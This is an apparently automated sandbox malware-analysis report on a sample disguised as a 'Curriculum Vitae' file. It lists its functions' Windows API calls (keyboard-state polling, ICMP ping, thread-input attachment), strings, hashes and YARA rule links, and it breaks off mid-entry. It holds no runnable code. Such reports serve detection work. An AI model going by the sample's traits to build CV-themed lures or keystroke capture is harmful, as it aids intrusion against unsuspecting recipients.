                      • Opcode Fuzzy Hash: 3563e5818f5bae37f05f235e4c0e05c96e680fb5078c1b9d5e5fa0fd001f4f05
                      • Instruction Fuzzy Hash: 6B617D3190460AEBDF108F54EC84EFE7BB9EB09720F144149F665AB2A5D770AAC1DB70
                      Function 00D8FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D8FAAF
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00D8FB08
                      • VariantInit.OLEAUT32(?), ref: 00D8FB1A
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D8FB3A
                      • VariantCopy.OLEAUT32(?,?), ref: 00D8FB8D
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D8FBA1
                      • VariantClear.OLEAUT32(?), ref: 00D8FBB6
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00D8FBC3
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D8FBCC
                      • VariantClear.OLEAUT32(?), ref: 00D8FBDE
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D8FBE9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: a4ff2e1bd8b4ef89c503dfda8acdc769333d9b8786da69e6edb4d5343f8fcaaf
                      • Instruction ID: 26951536bd7ac857c4c021d8ea08adca42edd181c909d932744872181f620d4d
                      • Opcode Fuzzy Hash: a4ff2e1bd8b4ef89c503dfda8acdc769333d9b8786da69e6edb4d5343f8fcaaf
                      • Instruction Fuzzy Hash: FE413035A1421AAFCB04EF64C854DADBBB9EF48354F048065E959E7261D730B945CFB0
                      Function 00D99C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00D99CA1
                      • GetAsyncKeyState.USER32(000000A0), ref: 00D99D22
                      • GetKeyState.USER32(000000A0), ref: 00D99D3D
                      • GetAsyncKeyState.USER32(000000A1), ref: 00D99D57
                      • GetKeyState.USER32(000000A1), ref: 00D99D6C
                      • GetAsyncKeyState.USER32(00000011), ref: 00D99D84
                      • GetKeyState.USER32(00000011), ref: 00D99D96
                      • GetAsyncKeyState.USER32(00000012), ref: 00D99DAE
                      • GetKeyState.USER32(00000012), ref: 00D99DC0
                      • GetAsyncKeyState.USER32(0000005B), ref: 00D99DD8
                      • GetKeyState.USER32(0000005B), ref: 00D99DEA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: a853f83403be82ad7574a29ad3175a25b49cfa739f431300b6de7b0bab7b22a1
                      • Instruction ID: 7523d573698ea136697e5e3f4ed6babfe8fcb19899e31364b3b0e41204d1630a
                      • Opcode Fuzzy Hash: a853f83403be82ad7574a29ad3175a25b49cfa739f431300b6de7b0bab7b22a1
                      • Instruction Fuzzy Hash: EA41A6345047CA69FF31966888647B5FEA06F12344F0C805EDAC6576C2EBA599C8C7B2
                      Function 00DB055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00DB05BC
                      • inet_addr.WSOCK32(?), ref: 00DB061C
                      • gethostbyname.WSOCK32(?), ref: 00DB0628
                      • IcmpCreateFile.IPHLPAPI ref: 00DB0636
                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB06C6
                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB06E5
                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00DB07B9
                      • WSACleanup.WSOCK32 ref: 00DB07BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                      • String ID: Ping
                      • API String ID: 1028309954-2246546115
                      • Opcode ID: a95b401be60adcbb12776f747cc64e9024f7a8db7b8a8a881dc799b24cbc1c28
                      • Instruction ID: 81398724a8d9b8d1ecf3e533d9b3a5243b0c59d022fe1cf765793e19afbc0051
                      • Opcode Fuzzy Hash: a95b401be60adcbb12776f747cc64e9024f7a8db7b8a8a881dc799b24cbc1c28
                      • Instruction Fuzzy Hash: 4B914A75604302DFD720DF15C488F5ABBE4EF44318F1885A9E56A9B6A2CB30ED45CFA1
                      Function 00DB8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharLower
                      • String ID: cdecl$none$stdcall$winapi
                      • API String ID: 707087890-567219261
                      • Opcode ID: 0ba17809400d966deff1636420f0951fb51e754ac9752ec179a6623801d5443f
                      • Instruction ID: 8f2760b2743e0e9d3581a7b8d5b5f0fb455067767ef3fa058553fbecbce023ea
                      • Opcode Fuzzy Hash: 0ba17809400d966deff1636420f0951fb51e754ac9752ec179a6623801d5443f
                      • Instruction Fuzzy Hash: A151AE31A04116DBCF14DF68C8509FEB3A9EF64324B25422AF866E7284DB31DD40DBB0
                      Function 00DB372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32 ref: 00DB3774
                      • CoUninitialize.OLE32 ref: 00DB377F
                      • CoCreateInstance.OLE32(?,00000000,00000017,00DCFB78,?), ref: 00DB37D9
                      • IIDFromString.OLE32(?,?), ref: 00DB384C
                      • VariantInit.OLEAUT32(?), ref: 00DB38E4
                      • VariantClear.OLEAUT32(?), ref: 00DB3936
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 636576611-1287834457
                      • Opcode ID: 7120618e217051cc165ff37efc79e2b92a35f0a4154d9f1b8082b3d545b2a72d
                      • Instruction ID: 02867e30ad40ecfe8313bbd66b920426d934429b71b66d2590c58a874b3d0bb4
                      • Opcode Fuzzy Hash: 7120618e217051cc165ff37efc79e2b92a35f0a4154d9f1b8082b3d545b2a72d
                      • Instruction Fuzzy Hash: CB616A75608301EFD710DF54C888BAABBE8EF49710F144919F5869B291DB70EE48DBB2
                      Function 00DC8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                        • Part of subcall function 00D4912D: GetCursorPos.USER32(?), ref: 00D49141
                        • Part of subcall function 00D4912D: ScreenToClient.USER32(00000000,?), ref: 00D4915E
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000001), ref: 00D49183
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000002), ref: 00D4919D
                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00DC8B6B
                      • ImageList_EndDrag.COMCTL32 ref: 00DC8B71
                      • ReleaseCapture.USER32 ref: 00DC8B77
                      • SetWindowTextW.USER32(?,00000000), ref: 00DC8C12
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DC8C25
                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00DC8CFF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#
                      • API String ID: 1924731296-655930031
                      • Opcode ID: a71887e6c8ab36437ee86c55f1dc16aff8a4ccd81d5cb9cb5d29bc5c5ad18300
                      • Instruction ID: 5e2c8d7af2cba2c5c3fb152413d8bb68a35827d49f21149625b434eebc5d3b66
                      • Opcode Fuzzy Hash: a71887e6c8ab36437ee86c55f1dc16aff8a4ccd81d5cb9cb5d29bc5c5ad18300
                      • Instruction Fuzzy Hash: CC516A70104305AFD704DF14D996FAA77E4FB88750F44062DFA96AB2E1CB719948CB72
                      Function 00DA3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DA33CF
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DA33F0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LoadString$_wcslen
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                      • API String ID: 4099089115-3080491070
                      • Opcode ID: 26c03655b915787b413931d715cf4433aa1f2c3a0154a4ec2cd534200a916cde
                      • Instruction ID: 28b3ca5c62bf3bd38219a2f2e05d75b53faa416b4120fdb13ecdf7c59b8ded24
                      • Opcode Fuzzy Hash: 26c03655b915787b413931d715cf4433aa1f2c3a0154a4ec2cd534200a916cde
                      • Instruction Fuzzy Hash: FA51997290020AAADF15EBA4CE52EEEB379EF04340F148165F105720A2EB756F98CB70
                      Function 00D9B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharUpper
                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                      • API String ID: 1256254125-769500911
                      • Opcode ID: 151ca9c15bb614604d4e920aa9c5d8b17f3844e800b7db2f4461b3c3dfc5b2f3
                      • Instruction ID: 4683e82ad460f52ac2499b2a60a7053a70f6dd222e35c28f78a49b1357313d76
                      • Opcode Fuzzy Hash: 151ca9c15bb614604d4e920aa9c5d8b17f3844e800b7db2f4461b3c3dfc5b2f3
                      • Instruction Fuzzy Hash: FC41ED32A001279ACF106F7D9A905BE77A5EF60774B2A422BE561DF284E731DD81C770
                      Function 00DA5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA53A0
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DA5416
                      • GetLastError.KERNEL32 ref: 00DA5420
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00DA54A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 56e4c9f8c4989ea7216a471a0db46cbd220d34b7171d456e3224d4d3bcf6628d
                      • Instruction ID: e69a0226517c1c6133b599cd4856b41a9b3df4df530e57b4d5e33aed6fe0d288
                      • Opcode Fuzzy Hash: 56e4c9f8c4989ea7216a471a0db46cbd220d34b7171d456e3224d4d3bcf6628d
                      • Instruction Fuzzy Hash: D531F435A006099FC710DF68D884EAEBBB4EF0A305F188065E506CB796D7B0DD82CBB1
                      Function 00DC3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                      Download Yara Rule
                      APIs
                      • CreateMenu.USER32 ref: 00DC3C79
                      • SetMenu.USER32(?,00000000), ref: 00DC3C88
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DC3D10
                      • IsMenu.USER32(?), ref: 00DC3D24
                      • CreatePopupMenu.USER32 ref: 00DC3D2E
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DC3D5B
                      • DrawMenuBar.USER32 ref: 00DC3D63
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                      • String ID: 0$F
                      • API String ID: 161812096-3044882817
                      • Opcode ID: d2d6fe8ecf86d768dff47622ec483275762d4efa0e24b62e435151c00bca925e
                      • Instruction ID: 5731b5d61f78b0c363f4dd8283d11add5a0f39496a67a8ef3a98adbc469a43e8
                      • Opcode Fuzzy Hash: d2d6fe8ecf86d768dff47622ec483275762d4efa0e24b62e435151c00bca925e
                      • Instruction Fuzzy Hash: 8E415975A1130AAFDB14CF64D844FAA7BB5FF49350F18402CEA46A7360D731AA15CFA0
                      Function 00DC3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DC3A9D
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DC3AA0
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC3AC7
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC3AEA
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DC3B62
                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DC3BAC
                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DC3BC7
                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DC3BE2
                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DC3BF6
                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DC3C13
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow
                      • String ID:
                      • API String ID: 312131281-0
                      • Opcode ID: 3d1eeee11549ad869f5651fa13bc10203b20790b9d481f97f9515e6d69a1df22
                      • Instruction ID: 3c106dd66d32eacd6463fe82d50da75a0a6258e9dca70f4e0f5931b3da97f6f3
                      • Opcode Fuzzy Hash: 3d1eeee11549ad869f5651fa13bc10203b20790b9d481f97f9515e6d69a1df22
                      • Instruction Fuzzy Hash: 87617B75900209AFDB10DFA8CD81FEE77B8EB49700F144199FA15EB2A1D770AE85DB60
                      Function 00D9B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00D9B151
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B165
                      • GetWindowThreadProcessId.USER32(00000000), ref: 00D9B16C
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B17B
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9B18D
                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B1A6
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B1B8
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B1FD
                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B212
                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B21D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 2cfb7dc4d31beff60f4b741b35c331da35f4874b3cfb9999e8f7d4670265e96d
                      • Instruction ID: 6574b5f55a76ececb1ff8b9cef0bc9ff88d3036b63b9801096d3d45b5fcf9a39
                      • Opcode Fuzzy Hash: 2cfb7dc4d31beff60f4b741b35c331da35f4874b3cfb9999e8f7d4670265e96d
                      • Instruction Fuzzy Hash: 8731CE71650305AFDF109FA5EE48F6D7BAEEB10321F155006FA04E62A0C7B0AA858F34
                      Function 00D62C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D62C94
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D62CA0
                      • _free.LIBCMT ref: 00D62CAB
                      • _free.LIBCMT ref: 00D62CB6
                      • _free.LIBCMT ref: 00D62CC1
                      • _free.LIBCMT ref: 00D62CCC
                      • _free.LIBCMT ref: 00D62CD7
                      • _free.LIBCMT ref: 00D62CE2
                      • _free.LIBCMT ref: 00D62CED
                      • _free.LIBCMT ref: 00D62CFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: fa4bd243db98be75660d104545fb2528362f7165dcd8ab305aa61d460154ba52
                      • Instruction ID: 2645a25f995776d91de216875c6ee06e35f23447bceed80dff065e649d4f8f5b
                      • Opcode Fuzzy Hash: fa4bd243db98be75660d104545fb2528362f7165dcd8ab305aa61d460154ba52
                      • Instruction Fuzzy Hash: 74119376640508BFCB06EF54D882CED3BA5FF45390F4144A6FA489B222DB31EA509FB0
                      Function 00D31410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                      Download Yara Rule
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D31459
                      • OleUninitialize.OLE32(?,00000000), ref: 00D314F8
                      • UnregisterHotKey.USER32(?), ref: 00D316DD
                      • DestroyWindow.USER32(?), ref: 00D724B9
                      • FreeLibrary.KERNEL32(?), ref: 00D7251E
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D7254B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 469580280-3243417748
                      • Opcode ID: 6827b4793151a774bab340a1e2bdda1f52c5de8c0f10434bcbbf6087aa482b88
                      • Instruction ID: 3ec070c07dc8eee3ea2e4b4e4ade6c183cd686ccf5ff11b5b61050eeb4a8fb56
                      • Opcode Fuzzy Hash: 6827b4793151a774bab340a1e2bdda1f52c5de8c0f10434bcbbf6087aa482b88
                      • Instruction Fuzzy Hash: F9D137356012538FCB29EF55C899A29F7A5FF05700F1882ADE54AAB261DB30ED12CF71
                      Function 00D35BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                      Download Yara Rule
                      APIs
